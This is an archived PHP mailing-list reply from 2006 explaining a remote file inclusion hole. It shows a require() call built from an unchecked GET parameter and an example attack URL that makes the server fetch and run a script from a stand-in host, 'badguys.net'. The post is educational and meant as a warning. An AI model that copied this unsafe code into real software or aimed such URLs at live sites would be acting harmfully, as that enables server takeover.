Re: Fwd: [PHP] Highjack?
- From: stuttle@xxxxxxxxx (Stut)
- Date: Tue, 14 Nov 2006 21:13:19 +0000
tedd wrote:
Ohhh, so "badscript.php doesn't have to exist and the badscript.txt is imported via the url, the script is built using only the badscript.txt, and then executed "as-is" -- clever.
Off to try that... :-)
...
Nope, that didn't work -- I still don't get it.
I realize that one can grab stuff from another server, but I still don't see how one can do this.
Ok, so badscript.php is a bad name for this script. Let's say show.php is a script you've written. You were tired, the kids were running around you screaming and shouting, and you wrote something like the following without really thinking about it...
<?php
require($_GET['path'].'commonfuncs.inc.php');
// Do other stuff here, using functions in commonfuncs.inc.php
?>
The *bad guy* can now hit the URL...
http://yoursite.com/show.php?path=http://badguys.net/injectionscript.txt?ignored=
This causes show.php to include (i.e. execute!!) the remote file injectionscript.txt from badguys.net at this URL...
http://badguys.net/injectionscript.txt?ignored=commonfuncs.inc.php
Since this gets executed on your server it can do anything one of your scripts can do. The only symptom would be that show.php will not work for that request. Do the bad guys care? Probably not, because by the time it fails they've already replaced your index.php and potentially installed a rootkit, backdoors and whatever else (depending, of course, on how locked down the web server is and your file permissions).
Hope that makes sense now.
-Stut
.
- Follow-Ups:
- Re: Fwd: [PHP] Highjack?
- From: tedd
- Re: Fwd: [PHP] Highjack?
- References:
- RE: Fwd: [PHP] Highjack?
- From: tedd
- RE: Fwd: [PHP] Highjack?
- Prev by Date: PHP programmers required
- Next by Date: Re: [PHP] one click - two actions?
- Previous by thread: RE: Fwd: [PHP] Highjack?
- Next by thread: Re: Fwd: [PHP] Highjack?
- Index(es):
Relevant Pages
|
